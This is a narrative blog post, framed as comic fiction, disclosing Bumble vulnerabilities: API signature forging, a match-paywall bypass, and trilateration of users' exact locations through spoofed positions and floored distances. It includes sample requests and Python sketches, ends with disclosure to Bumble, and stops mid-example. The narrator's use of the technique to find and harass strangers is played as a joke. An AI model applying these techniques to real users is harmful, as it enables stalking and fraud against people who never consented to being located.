Vulnerability in Bumble dating app reveals any user's exact location

25 Aug 2021

The vulnerability in this post is real. The story and characters are obviously not.

You are worried about your good buddy and co-CEO, Steve Steveington. Business has been bad at Steveslist, the online marketplace that you co-founded together where people can buy and sell things and no one asks too many questions. The Covid-19 pandemic has been uncharacteristically kind to most of the tech industry, but not to your particular sliver of it. Your board of directors blame “comatose, monkey-brained leadership”. You blame macro-economic factors outside your control and lazy employees.

Either way, you’ve been trying as best you can to keep the company afloat, cooking your books browner than ever and turning an even blinder eye to plainly felonious transactions. But you’re scared that Steve, your co-CEO, is getting cold feet. You keep telling him that the only way out of this tempest is through it, but he doesn’t think that this metaphor really applies here and he doesn’t see how a spiral further into fraud and flimflam could ever lead out of another side. This makes you even more worried - the Stevenator is always the one pushing for more spiralling. Something must be afoot.



Your office in the 19th Century Literature section of the San Francisco Public Library is only a mile away from the headquarters of the San Francisco FBI. Could Steve be ratting you out? When he says he’s nipping out to clear his head, is he actually nipping out to clear his conscience? You would follow him, but he only ever darts out when you’re in a meeting.

Fortunately the Stevester is an avid user of Bumble, the popular online dating app, and you think you may be able to use Steve’s Bumble account to find out where he is sneaking off to.

Here’s the plan. Like most online dating apps, Bumble tells its users how far away they are from each other. This enables users to make an informed decision about whether a potential paramour looks worth a 5 mile scooter ride on a bleak Wednesday evening when there’s alternatively a cold pizza in the fridge and millions of hours of YouTube that they haven’t watched. It’s practical and provocative to know roughly how near a hypothetical honey is, but it’s very important that Bumble doesn’t reveal a user’s exact location. This could allow an attacker to deduce where the user lives, where they are right now, and whether or not they are an FBI informant.

A brief history lesson

However, keeping users’ exact locations private is surprisingly easy to foul up. You and Kate have already studied the history of location-revealing vulnerabilities as part of a previous blog post. In that post you tried to exploit Tinder’s user location features in order to motivate another Steve Steveington-centric scenario lazily similar to this one. Nonetheless, readers who are already familiar with that post should still stick with this one - the following recap is short and after that things get interesting indeed.

As one of the trailblazers of location-based online dating, Tinder was inevitably also one of the trailblazers of location-based security vulnerabilities. Over the years they’ve accidentally allowed an attacker to find the exact location of their users in several different ways. The first vulnerability was prosaic. Until 2014, the Tinder servers sent the Tinder app the exact co-ordinates of a potential match, then the app calculated the distance between this match and the current user. The app didn’t display the other user’s exact co-ordinates, but an attacker or interested creep could intercept their own network traffic on its way from the Tinder server to their phone and read a target’s exact co-ordinates out of it.

    {
      "user_id": 1234567890,
      "location": {
        "latitude": 37.774904,
        "longitude": -122.419422
      },
      // ...etc...
    }
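To see why raw co-ordinates were all an attacker needed, here is a minimal sketch of the kind of distance calculation a client could run on them. It assumes the haversine formula and a mean Earth radius of 3958.8 miles. The function name and the attacker's position are illustrative, and nothing here says which formula Tinder's app actually used.

```python
import math

EARTH_RADIUS_MILES = 3958.8  # mean Earth radius; an approximation


def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance in miles between two points given in degrees."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    d_phi = phi2 - phi1
    d_lambda = math.radians(lon2 - lon1)
    a = (
        math.sin(d_phi / 2) ** 2
        + math.cos(phi1) * math.cos(phi2) * math.sin(d_lambda / 2) ** 2
    )
    return 2 * EARTH_RADIUS_MILES * math.asin(math.sqrt(a))


# Co-ordinates of the kind an intercepted response would contain (example values).
match_location = {"latitude": 37.774904, "longitude": -122.419422}
# Hypothetical position of the person doing the intercepting.
my_location = {"latitude": 37.80, "longitude": -122.41}

distance = haversine_miles(
    my_location["latitude"],
    my_location["longitude"],
    match_location["latitude"],
    match_location["longitude"],
)
# The app would only display the rounded figure, but the exact inputs were on the wire.
print(f"{round(distance)} miles away")
```

The rounding on the last line is purely cosmetic: anyone reading the response already holds the exact latitude and longitude.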

To mitigate this attack, Tinder switched to calculating the distance between users on their server, rather than on users’ phones. Instead of sending a match’s exact location to a user’s phone, they sent only pre-calculated distances. This meant that the Tinder app never saw a potential match’s exact co-ordinates, and so neither did an attacker. However, even though the app only displayed distances rounded to the nearest mile (“8 miles”, “3 miles”), Tinder sent these distances to the app with 15 decimal places of precision and had the app round them before displaying them. This unnecessary precision allowed security researchers to use a technique called trilateration (which is similar to but technically not the same as triangulation) to re-derive a victim’s almost-exact location.

    {
      "user_id": 1234567890,
      "distance": 5.21398760815170,
      // ...etc...
    }





Here’s how trilateration works. Tinder knows a user’s location because their app periodically sends it to them. However, it is straightforward to spoof fake location updates that make Tinder think you’re at an arbitrary location of your choosing. The researchers spoofed location updates to Tinder, moving their attacker user around their victim’s city. From each spoofed location, they asked Tinder how far away their victim was. Seeing nothing amiss, Tinder returned the answer, to 15 decimal places of precision. The researchers repeated this process 3 times, and then drew 3 circles on a map, with centres equal to the spoofed locations and radii equal to the reported distances to the user. The point at which all 3 circles intersected gave the exact location of the victim.
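The circle-intersection step can be sketched in a few lines. This is a simplified version that assumes the city is small enough to treat as a flat plane, with positions measured in miles. The function `trilaterate` and the sample points are made up for illustration and are not the researchers' code.

```python
import math


def trilaterate(c1, r1, c2, r2, c3, r3):
    """Return the (x, y) point that lies on all three circles.

    Subtracting the first circle's equation from the other two cancels the
    squared unknowns and leaves two linear equations, solved here with
    Cramer's rule.
    """
    (x1, y1), (x2, y2), (x3, y3) = c1, c2, c3
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    d1 = r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    d2 = r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("centres are collinear, so the position is ambiguous")
    x = (d1 * b2 - d2 * b1) / det
    y = (a1 * d2 - a2 * d1) / det
    return x, y


# Simulated scenario: the victim's true position is unknown to the attacker,
# who only learns the distance from each spoofed location.
victim = (2.0, 3.0)
spoofed_locations = [(0.0, 0.0), (5.0, 0.0), (0.0, 6.0)]
distances = [math.hypot(victim[0] - x, victim[1] - y) for x, y in spoofed_locations]

estimate = trilaterate(
    spoofed_locations[0], distances[0],
    spoofed_locations[1], distances[1],
    spoofed_locations[2], distances[2],
)
print(estimate)
```

The three spoofed locations must not lie on a straight line, otherwise two mirror-image points satisfy all three distances.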

Tinder fixed this vulnerability by both calculating and rounding the distances between users on their servers, and only ever sending their app these fully-rounded values. You’ve read that Bumble also only send fully-rounded values, perhaps having learned from Tinder’s mistakes. Rounded distances can still be used to do approximate trilateration, but only to within a mile-by-mile square or so. This isn’t good enough for you, since it won’t tell you whether the Stevester is at FBI HQ or the McDonald’s half a mile away. In order to locate Steve with the precision you need, you’re going to need to find a new vulnerability.

You’re going to need help.

Forming a hypothesis

You can always rely on your other good buddy, Kate Kateberry, to get you out of a jam. You still haven’t paid her for all the systems design advice that she gave you last year, but fortunately she has enemies of her own that she needs to keep tabs on, and she too could make good use of a vulnerability in Bumble that revealed a user’s exact location. After a brief phone call she hurries over to your offices in the San Francisco Public Library to start looking for one.

When she arrives she hums and haws and has an idea.

“Our problem”, she says, “is that Bumble rounds the distance between two users, and sends only this approximate distance to the Bumble app. As you know, this means that we can’t do trilateration with any useful precision. However, within the details of how Bumble calculate these approximate distances lie opportunities for them to make mistakes that we might be able to exploit.

“One sensible-seeming approach would be for Bumble to calculate the exact distance between two users and then round this distance to the nearest mile. The code to do this might look something like this:

    def calculate_approximate_distance(user1_location, user2_location):
        # Calculate the exact distance
        exact_distance = calculate_exact_distance(
            user1_location,
            user2_location,
        )
        # Round it to the nearest mile
        rounded_distance = round(exact_distance)
        # Return the rounded distance
        return rounded_distance



“Sensible-seeming, but also dangerously insecure. If an attacker (i.e. us) can find the point at which the reported distance to a user flips from, say, 3 miles to 4 miles, the attacker can infer that this is the point at which their victim is exactly 3.5 miles away from them. 3.49999 miles rounds down to 3 miles, 3.50000 rounds up to 4. The attacker can find these flipping points by spoofing a location request that puts them in roughly the vicinity of their victim, then slowly shuffling their position in a constant direction, at each point asking Bumble how far away their victim is. When the reported distance changes from (say) 3 to 4 miles, they’ve found a flipping point. If the attacker can find 3 different flipping points then they’ve once again got 3 exact distances to their victim and can perform precise trilateration, exactly as the researchers attacking Tinder did.”

How do we know if this is what Bumble does? you ask. “We try out an attack and see if it works”, replies Kate.

This means that you and Kate are going to need to write an automated script that sends a carefully crafted sequence of requests to the Bumble servers, leaping your user around the city and repeatedly asking for the distance to your victim. To do this you’ll need to work out:

- How the Bumble app communicates with the server

- How the Bumble API works

- How to send API requests that change your location

- How to send API requests that tell you how far away another user is

You decide to use the Bumble website on your laptop rather than the Bumble smartphone app. You find it easier to inspect traffic coming from a website than from an app, and you can use a desktop browser’s developer tools to read the JavaScript code that powers a site.

Creating accounts

You’ll need two Bumble profiles: one to be the attacker and one to be the victim. You’ll place the victim’s account in a known location, and use the attacker’s account to re-locate them. Once you’ve perfected the attack in the lab you’ll trick Steve into matching with one of your accounts and launch the attack against him.

You sign up for your first Bumble account. It asks you for a profile picture. To preserve your privacy you upload a picture of the ceiling. Bumble rejects it for “not passing our photo guidelines.” They must be performing facial recognition. You upload a stock photo of a man in a nice shirt pointing at a whiteboard.

Bumble rejects it again. Maybe they’re comparing the photo against a database of stock photos. You crop the photo and scribble on the background with a paintbrush tool. Bumble accepts the photo! However, next they ask you to submit a selfie of yourself putting your right hand on your head, to prove that your picture really is of you. You don’t know how to contact the man in the stock photo and you’re not sure that he would send you a selfie. You do your best, but Bumble rejects your effort. There’s no option to change your initially submitted profile photo until you’ve passed this verification so you abandon this account and start again.

You don’t want to compromise your privacy by submitting real photos of yourself, so you take a profile picture of Jenna the intern and then another picture of her with her right hand on her head. She is confused but she knows who pays her salary, or at least who might one day pay her salary if the next six months go well and a suitable full-time position is available. You take the same set of photos of Wilson in…marketing? Finance? Who cares. You successfully create two accounts, and now you’re ready to start swiping.



Even though you probably don’t need to, you want to have your accounts match with each other in order to give them the highest possible access to each other’s information. You restrict Jenna and Wilson’s match filter to “within 1 mile” and start swiping. Before too long your Jenna account is shown your Wilson account, so you swipe right to indicate her interest. However, your Wilson account keeps swiping left without ever seeing Jenna, until eventually he is told that he has seen all the potential matches in his area. Strange. You see a notification telling Wilson that someone has already “liked” him. Sounds promising. You click on it. Bumble demands $1.99 in order to show you your not-so-mysterious admirer.

You preferred it when these dating apps were in their hyper-growth phase and your trysts were paid for by venture capitalists. You reluctantly reach for the company credit card but Kate knocks it out of your hand. “We don’t need to pay for this. I bet we can bypass this paywall. Let’s pause our efforts to get Jenna and Wilson to match and start investigating how the app works.” Never one to pass up the opportunity to stiff a few bucks, you happily agree.

Automating requests to the Bumble API





In order to figure out how the app works, you need to work out how to send API requests to the Bumble servers. Their API isn’t publicly documented because it isn’t intended to be used for automation and Bumble doesn’t want people like you doing things like what you’re doing. “We’ll use a tool called Burp Suite,” Kate says. “It’s an HTTP proxy, which means we can use it to intercept and inspect HTTP requests going from the Bumble website to the Bumble servers. By studying these requests and responses we can work out how to replay and edit them. This will allow us to make our own, customized HTTP requests from a script, without needing to go through the Bumble app or website.”

Kate sets up Burp Suite, and shows you the HTTP requests that your laptop is sending to the Bumble servers. She swipes yes on a rando. “See, this is the HTTP request that Bumble sends when you swipe yes on someone:

    POST /mwebapi.phtml?SERVER_ENCOUNTERS_VOTE HTTP/1.1
    Host: eu1.bumble.com
    Cookie: CENSORED
    X-Pingback: 81df75f32cf12a5272b798ed01345c1c
    [[...further headers deleted for brevity...]]
    Sec-Gpc: 1
    Connection: close

    {
      "$gpb": "badoo.bma.BadooMessage",
      "body": [
        {
          "message_type": 80,
          "server_encounters_vote": {
            "person_id": "CENSORED",
            "vote": 3,
            "vote_source": 1,
            "game_mode": 0
          }
        }
      ],
      "message_id": 71,
      "message_type": 80,
      "version": 1,
      "is_background": false
    }

“There’s the user ID of the swipee, in the person_id field inside the body field. If we can figure out the user ID of Jenna’s account, we can insert it into this ‘swipe yes’ request from our Wilson account. If Bumble doesn’t check that the user you swiped is currently in your feed then they’ll probably accept the swipe and match Wilson with Jenna.” How can we work out Jenna’s user ID? you ask.

“I’m sure we could find it by inspecting HTTP requests sent by our Jenna account” says Kate, “but I have a more interesting idea.” Kate finds the HTTP request and response that loads Wilson’s list of pre-yessed accounts (which Bumble calls his “Beeline”).

“Look, this request returns a list of blurred images to display on the Beeline page. But alongside each image it also shows the user ID that the image belongs to! That first picture is of Jenna, so the user ID alongside it must be Jenna’s.”

    {
      // ...
      "users": [
        {
          "$gpb": "badoo.bma.User",
          // Jenna's user ID
          "user_id": "CENSORED",
          "projection": [340, 871],
          "access_level": 30,
          "profile_photo": {
            "$gpb": "badoo.bma.Photo",
            "id": "CENSORED",
            "preview_url": "//pd2eu.bumbcdn.com/p33/hidden?euri=CENSORED",
            "large_url": "//pd2eu.bumbcdn.com/p33/hidden?euri=CENSORED",
            // ...
          }
        },
        // ...
      ]
    }

Wouldn’t knowing the user IDs of the people in their Beeline allow anyone to spoof swipe-yes requests on all the people who have swiped yes on them, without paying Bumble $1.99? you ask. “Yes,” says Kate, “assuming that Bumble doesn’t validate that the user who you’re trying to match with is in your match queue, which in my experience dating apps tend not to. So I suppose we’ve probably found our first real, if unexciting, vulnerability. (EDITOR’S NOTE: this ancillary vulnerability was fixed shortly after the publication of this post.)

“Anyway, let’s insert Jenna’s ID into a swipe-yes request and see what happens.”

What happens is that Bumble returns a “Server Error”.

Forging signatures





“That’s strange,” says Kate. “I wonder what it didn’t like about our edited request.” After some experimentation, Kate realises that if you edit anything about the HTTP body of a request, even just adding an innocuous extra space at the end of it, then the edited request will fail. “That suggests to me that the request contains something called a signature,” says Kate. You ask what that means.

“A signature is a string of random-looking characters generated from a piece of data, and it’s used to detect when that piece of data has been altered. There are many different ways of generating signatures, but for a given signing process, the same input will always produce the same signature.

“In order to use a signature to verify that a piece of text hasn’t been tampered with, a verifier can re-generate the text’s signature themselves. If their signature matches the one that came with the text, then the text hasn’t been tampered with since the signature was generated. If it doesn’t match then it has. If the HTTP requests that we’re sending to Bumble contain a signature somewhere then this would explain why we’re seeing an error message. We’re changing the HTTP request body, but we’re not updating its signature.
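The verify-by-regenerating idea can be shown with a toy example. This sketch uses an unkeyed SHA-256 digest as the "signature", which is an assumption made purely to keep the example short. The names `sign` and `verify` are illustrative and say nothing about what Bumble actually does.

```python
import hashlib


def sign(text: str) -> str:
    """Toy signature: a deterministic digest of the text."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def verify(text: str, signature: str) -> bool:
    """Re-generate the signature and compare it with the one that was supplied."""
    return sign(text) == signature


original_body = '{"vote": 3}'
signature = sign(original_body)

# The untouched body verifies. A single trailing space is enough to break it.
print(verify(original_body, signature))
print(verify(original_body + " ", signature))
```

This matches the behaviour Kate observed: any edit to the body, however small, produces a different signature and so fails the check.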





“Before sending an HTTP request, the JavaScript running on the Bumble website must generate a signature from the request’s body and attach it to the request somehow. When the Bumble server receives the request, it checks the signature. It accepts the request if the signature is valid and rejects it if it isn’t. This makes it very, very slightly harder for sneakertons like us to mess with their system.

“However”, continues Kate, “even without knowing anything about how these signatures are produced, I can say for certain that they don’t provide any actual security. The problem is that the signatures are generated by JavaScript running on the Bumble website, which executes on our computer. This means that we have access to the JavaScript code that generates the signatures, including any secret keys that may be used. This means that we can read the code, work out what it’s doing, and replicate the logic in order to generate our own signatures for our own edited requests. The Bumble servers will have no idea that these forged signatures were generated by us, rather than the Bumble website.



“Let’s try and find the signatures in these requests. We’re looking for a random-looking string, maybe 30 characters or so long. It could technically be anywhere in the request - path, headers, body - but I would guess that it’s in a header.” How about this? you say, pointing to an HTTP header called X-Pingback with a value of 81df75f32cf12a5272b798ed01345c1c.

    POST /mwebapi.phtml?SERVER_ENCOUNTERS_VOTE HTTP/1.1
    ...
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0
    X-Pingback: 81df75f32cf12a5272b798ed01345c1c
    Content-Type: application/json
    ...

“Perfect,” says Kate, “that’s an odd name for the header, but the value sure looks like a signature.” This sounds like progress, you say. But how can we find out how to generate our own signatures for our edited requests?

“We can start with a few educated guesses,” says Kate. “I suspect that the programmers who built Bumble know that these signatures don’t actually secure anything. I suspect that they only use them in order to dissuade unmotivated tinkerers and create a small speedbump for motivated ones like us. They might therefore just be using a simple hash function, like MD5 or SHA256. No one would ever use a plain old hash function to generate real, secure signatures, but it would be perfectly reasonable to use them to generate small inconveniences.” Kate copies the HTTP body of a request into a file and runs it through a few such simple functions. None of them match the signature in the request. “No problem,” says Kate, “we’ll just have to read the JavaScript.”
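Kate's guess-and-check step might look something like the sketch below. It hashes a request body with a few common algorithms and reports any whose hex digest equals the observed header value. The helper name and the candidate list are assumptions, and the sample body is a stand-in rather than a real Bumble request.

```python
import hashlib


def find_matching_hash(body: bytes, observed: str, algorithms=("md5", "sha1", "sha256")):
    """Return the names of the algorithms whose digest of `body` equals `observed`."""
    matches = []
    for name in algorithms:
        digest = hashlib.new(name, body).hexdigest()
        if digest == observed.lower():
            matches.append(name)
    return matches


# Stand-in request body and the header value seen in the intercepted request.
sample_body = b'{"message_type": 80}'
observed_header = "81df75f32cf12a5272b798ed01345c1c"

print(len(observed_header) * 4, "bits")  # digest length hints at the algorithm family
print(find_matching_hash(sample_body, observed_header))
```

The header value is 32 hexadecimal characters, or 128 bits, which is the output size of MD5. That is only a hint, since a longer digest could have been truncated, but it makes MD5 the natural first suspect even when a plain hash of the body fails to match.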

Reading the JavaScript

Is this reverse-engineering? you ask. “It’s not as fancy as that,” says Kate. “‘Reverse-engineering’ implies that we’re probing the system from afar, and using the inputs and outputs that we observe to infer what’s going on inside it. But here all we have to do is read the code.” Can I still write reverse-engineering on my CV? you ask. But Kate is busy.











Kate is right that all you have to do is read the code, but reading code isn’t always easy. As is standard practice, Bumble have squashed all their JavaScript into one highly-condensed or minified file. They’ve primarily done this in order to reduce the amount of data that they have to send to users of their website, but minification also has the side-effect of making it trickier for an interested observer to understand the code. The minifier has removed all comments; changed all variables from descriptive names like signBody to inscrutable single-character names like f and R; and concatenated the code onto 39 lines, each thousands of characters long.

You suggest giving up and just asking Steve as a friend if he’s an FBI informant. Kate firmly and impolitely forbids this. “We don’t need to fully understand the code in order to work out what it’s doing.” She downloads Bumble’s single, giant JavaScript file onto her computer. She runs it through an un-minifying tool to make it easier to read. This can’t bring back the original variable names or comments, but it does reformat the code sensibly onto multiple lines which is still a big help. The expanded version weighs in at a little over 51,000 lines of code.





Next she searches for the string X-Pingback. Since this is a string, not a variable name, it shouldn’t have been affected by the minification and un-minification process. She finds the string on line 36,875 and starts tracing function calls to see how the corresponding header value is generated.

You start to believe that this might work. A few minutes later she announces two discoveries.





“First”, she says, “I’ve found the function that generates the signature, on line 36,657.”

Oh excellent, you say, so we just have to re-write that function in our Python script and we’re good? “We could,” says Kate, “but that sounds difficult. I have an easier idea.” The function she has found contains lots of long, random-seeming, hard-coded numbers. She pastes 1732584193, the first of these numbers, into Google. It returns pages of results for implementations of a widely-used hash function called MD5. “This function is just MD5 written out in JavaScript,” she says, “so we can use Python’s built-in MD5 implementation from the hashlib module.”
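The search-engine trick works because hash functions start from fixed, published constants. As a small sketch, the number Kate searched for is 0x67452301 in hexadecimal, the first word of MD5's initial state as given in RFC 1321. The helper below is hypothetical and only checks a number against those four words.

```python
# MD5's four initial state words (A, B, C, D) from RFC 1321.
MD5_INITIAL_STATE = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)


def is_md5_initial_word(n: int) -> bool:
    """True if `n`, read as an unsigned 32-bit value, is one of MD5's initial words.

    JavaScript implementations often write these constants as signed 32-bit
    integers, so negative inputs are normalised first.
    """
    return (n & 0xFFFFFFFF) in MD5_INITIAL_STATE


print(hex(1732584193))
print(is_md5_initial_word(1732584193))
print(is_md5_initial_word(-271733879))  # signed form of 0xEFCDAB89
```

SHA-1 begins with the same four words, so a match like this narrows the field rather than proving MD5 on its own. The length of the resulting digest and the rest of the function settle the question.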

But we already tried MD5 and it didn’t work, you protest. “True,” says Kate, “which brings me to my second discovery. Before passing a request body into MD5 to sign it, Bumble prefixes the body with a long key string (exact value redacted), and then signs the combination of the key and the body.

    const not_actually_secret_key = "REDACTED"
    // Exact combination method redacted
    const signature = md5(combine_somehow(not_actually_secret_key, http_body))

“This is somewhat similar to how real-world cryptographic signing algorithms like HMAC (Hash-based Message Authentication Code) work. When generating an HMAC, you combine the text that you want to sign with a secret key, then pass it through a deterministic function like MD5. A verifier who knows the secret key can repeat this process to verify that the signature is valid, but an attacker can’t generate new signatures because they don’t know the secret key. However, this doesn’t work for Bumble because their secret key necessarily has to be hard-coded in their JavaScript, which means that we know what it is. This means that we can generate valid new signatures for our own edited requests by adding the key to our request bodies and passing the result through MD5.”
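A rough Python equivalent of this scheme, set next to a real HMAC for contrast, might look like the sketch below. The key is left as the placeholder `"REDACTED"`, and plain key-then-body concatenation is an assumption made for illustration only, since the actual combination method is deliberately withheld. The function names are hypothetical.

```python
import hashlib
import hmac

NOT_ACTUALLY_SECRET_KEY = "REDACTED"  # placeholder, not a real key


def sign_body(http_body: str, key: str = NOT_ACTUALLY_SECRET_KEY) -> str:
    """MD5 over key and body. Simple concatenation is assumed, not confirmed."""
    return hashlib.md5((key + http_body).encode("utf-8")).hexdigest()


def hmac_md5(http_body: str, key: str = NOT_ACTUALLY_SECRET_KEY) -> str:
    """A standard HMAC-MD5 over the same inputs, shown only for comparison."""
    return hmac.new(key.encode("utf-8"), http_body.encode("utf-8"), hashlib.md5).hexdigest()


body = '{"message_type": 80}'
edited_body = '{"message_type": 80} '

# Anyone holding the key can re-sign an edited body, which is the whole problem.
print(sign_body(body))
print(sign_body(edited_body))
print(hmac_md5(body))
```

Swapping in HMAC would not rescue the design. Both constructions are only as secret as the key, and a key shipped to every browser is not secret.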

Kate writes a script that builds and sends HTTP requests to the Bumble API. It signs these requests in the X-Pingback header using the key REDACTED and the MD5 algorithm. In order to allow her script to act as your Jenna user, Kate copies the Jenna user’s cookies from her browser into her script and adds them into her requests. Now she is able to send a signed, authenticated, customized ‘match’ request to Bumble that matches Wilson with Jenna. Bumble accepts and processes the request, and congratulates her on her new match. You do not have to give Bumble $1.99.

Any questions so far? asks Kate. You don’t want to sound stupid so you say no.

Testing the attack

Now that you know how to send arbitrary requests to the Bumble API from a script you can start testing out a trilateration attack. Kate spoofs an API request to put Wilson in the middle of the Golden Gate Bridge. It’s Jenna’s task to re-locate him.



Remember, Bumble only show you the approximate distance between you and other users. However, your hypothesis is that they calculate each approximate distance by calculating the exact distance and then rounding it. If you can find the point at which a distance to a victim flips from (say) 3 miles to 4, you can infer that this is the point at which the victim is exactly 3.5 miles away. If you can find 3 such flipping points then you can use trilateration to precisely locate the victim.

Kate starts by putting Jenna in a random location in San Francisco. She then shuffles her south, 0.01 of a degree of latitude each time. With each shuffle she asks Bumble how far away Wilson is. When this flips from 4 to 5 miles, Kate backs Jenna up one step and shuffles south in smaller increments of 0.001 degrees until the distance flips from 4 to 5 again. This backtracking improves the precision of the measured point at which the distance flips.
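The coarse-then-fine search can be sketched against a simulated distance oracle instead of a real server. Everything here is an assumption for illustration: the one-dimensional setup (only latitude changes), the rough figure of 69 miles per degree of latitude, the victim's latitude, and the names `find_flip` and `simulated_report`. No network requests are made.

```python
MILES_PER_DEGREE_LAT = 69.0  # rough conversion; an approximation


def find_flip(report, start, coarse=-0.01, fine=-0.001, max_steps=10_000):
    """Walk from `start` until `report` changes value, then refine the result.

    Negative steps move south. Returns the first latitude, at `fine`
    resolution, where the reported distance differs from the previous one.
    """

    def walk(position, step):
        previous = report(position)
        for _ in range(max_steps):
            position += step
            if report(position) != previous:
                return position
        raise RuntimeError("reported distance never changed")

    coarse_flip = walk(start, coarse)
    # Back up one coarse step and approach the flip again in smaller steps.
    return walk(coarse_flip - coarse, fine)


VICTIM_LAT = 37.80  # hidden from the attacker in a real attack


def simulated_report(attacker_lat):
    """Stand-in for the server: exact distance rounded to the nearest mile."""
    return round(abs(attacker_lat - VICTIM_LAT) * MILES_PER_DEGREE_LAT)


flip_lat = find_flip(simulated_report, start=37.76)
exact_miles_at_flip = abs(flip_lat - VICTIM_LAT) * MILES_PER_DEGREE_LAT
print(flip_lat, exact_miles_at_flip)
```

The fine step size bounds the error: with steps of 0.001 degrees the measured flipping point lands within roughly 0.07 miles of the true threshold, and a third, even finer pass would tighten that further.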

After some trial and error, Kate realizes that Bumble doesn’t round its distances like most people were taught at school. When most people think of “rounding”, they think of a process where the cutoff is .5. 3.4999 rounds down to 3; 3.5000 rounds up to 4. However, Bumble floors distances, which means that everything is always rounded down. 3.0001, 3.4999, and 3.9999 all round down to 3; 4.0001 rounds down to 4. This discovery doesn’t break the attack - it just means you have to edit your script to note that the point at which the distance flips from 3 miles to 4 miles is the point at which the victim is exactly 4.0 miles away, not 3.5 miles.
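The difference between the two behaviours is easy to see side by side. In this sketch `school_round` implements round-half-up explicitly, because Python's built-in `round` rounds exact halves to the nearest even number. Both helper names are illustrative.

```python
import math


def school_round(distance: float) -> int:
    """Round half up, the way most people are taught at school."""
    return math.floor(distance + 0.5)


def flip_distance(lower_reported: int, mode: str) -> float:
    """Exact distance at which the report changes from `lower_reported` to the next mile."""
    if mode == "round":
        return lower_reported + 0.5
    if mode == "floor":
        return lower_reported + 1.0
    raise ValueError(f"unknown mode: {mode}")


for exact in (3.0001, 3.4999, 3.5, 3.9999, 4.0001):
    print(exact, school_round(exact), math.floor(exact))

# Radius to use for the circle drawn at a 3-to-4 flipping point.
print(flip_distance(3, "round"), flip_distance(3, "floor"))
```

Only the radius assigned to each flipping point changes. The search for the flip and the trilateration that follows stay exactly the same.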

Kate writes a Python script to repeat this process 3 times, starting at 3 arbitrary locations. Once it has found 3 flipping points, her script draws 3 circles, each centred on a flipping point and with a radius equal to the higher of the two distances either side of the flip. The script takes a long time to develop because if you make too many requests or move yourself too far too often then Bumble rate-limits your requests and stops accepting position updates for a while. A stray minus sign temporarily puts Jenna in the middle of the Chinese province of Shandong, but after a brief timeout Bumble allows her to come back.

When the script eventually runs to completion you are both very pleased with what you see.

Executing the attack

You and Kate have a fun night together catfishing local strangers. You set Wilson and Jenna’s profiles to be interested in matches within 1 mile of your current location, and then spend a wholesome evening matching with people, trilaterating them to find out where they live, and knocking on their door while sending them weird Bumble messages. Sometimes you get the wrong house and the prank (or is it by this point a crime?) doesn’t land, but you still have a good time.

The next day you’re ready to execute your attack on the Stevedog himself. In order to target him you’ll need to find out his user ID, and the easiest way to do this is to match with him. Kate wonders if you need to make a new Bumble profile, since Steve will surely recognize Wilson and Jenna. You tell her that Steve turbo-swipes “Yes” on every person who appears in his feed in order to maximize his reach, which you think worked on 2012 Tinder but by now probably just makes Bumble’s algorithms think he’s desperate. He’s also a self-absorbed narcissist who doesn’t pay any attention to anyone other than himself, so the chances of him recognizing anyone are very low.

You have Jenna’s account swipe yes on Steve and then wait anxiously for a ping. It comes within the hour, during one of Steve’s trademark long toilet breaks. It’s a match.

You pretend to get on a call with a potential CFO. Steve slips out of the building. You call Kate over and you execute the trilateration attack on Steve. You can’t believe what your script spits out.

Three red circles that meet at the J Edgar Hoover Building, San Francisco. FBI Headquarters.

Revenge and reconciliation

You grab a copy of Anna Karenina by Tolstoy and pledge to kill Steve. When he returns you drag him into a conference room and start swinging. It’s not what you think, he protests. I’ve been trying to get the company back into the black by playing in the FBI poker game. Unfortunately it has not been going well, my goodness me. I might need to turn state’s evidence to get out of this new jam.

You brandish your 864 page 19th century classic.

Or I suppose we could do some A/B testing and try to improve our sales funnel conversion, he suggests.

You agree that that would be a good idea. Don’t do it for yourself, you say, do it for our team of 190 assorted interns, volunteers, and unpaid trial workers who all rely on this job, if not for income, then for valuable work experience that might one day help them break into the industry.

You put an arm around him and give him what you hope is a friendly yet highly menacing squeeze. Come on friend, you say, let’s get back to work.

Epilogue

Your adventure over without profit, you realize that you are still in possession of a serious vulnerability in an app used by millions of people. You try to sell the information on the dark web, but you can’t work out how. You list it on eBay but your post gets deleted. With literally every other option exhausted you do the decent thing and report it to the Bumble security team. Bumble reply quickly and within 72 hours have already deployed what looks like a fix. When you check back a few weeks later it appears that they’ve also added controls that prevent you from matching with or viewing users who aren’t in your match queue. These restrictions are a shrewd way to reduce the impact of future vulnerabilities, since they make it harder to execute attacks against arbitrary users.

In your report you suggest that before calculating the distance between two users they should round the users’ locations to the nearest 0.1 degree or so of longitude and latitude. They should then calculate the distance between these two rounded locations, round the result to the nearest mile, and display this rounded value in the app.
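The suggested fix can be sketched as follows. This is one possible reading of the recommendation, not Bumble's implementation: it assumes a 0.1 degree grid, the haversine formula, and a mean Earth radius of 3958.8 miles, and all function names are made up for the example.

```python
import math

EARTH_RADIUS_MILES = 3958.8  # mean Earth radius; an approximation


def snap(value: float, grid: float = 0.1) -> float:
    """Round a co-ordinate to the nearest multiple of `grid` degrees."""
    return round(value / grid) * grid


def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance in miles between two points given in degrees."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    d_phi = phi2 - phi1
    d_lambda = math.radians(lon2 - lon1)
    a = (
        math.sin(d_phi / 2) ** 2
        + math.cos(phi1) * math.cos(phi2) * math.sin(d_lambda / 2) ** 2
    )
    return 2 * EARTH_RADIUS_MILES * math.asin(math.sqrt(a))


def coarse_distance(location_a, location_b, grid: float = 0.1) -> int:
    """Snap both locations to the grid first, then measure and round the distance."""
    lat1, lon1 = (snap(v, grid) for v in location_a)
    lat2, lon2 = (snap(v, grid) for v in location_b)
    return round(haversine_miles(lat1, lon1, lat2, lon2))


# Two different victim positions that fall in the same grid cell.
victim_a = (37.7749, -122.4194)
victim_b = (37.7900, -122.4300)
attacker_positions = [(37.70, -122.50), (37.85, -122.30), (37.60, -122.45)]

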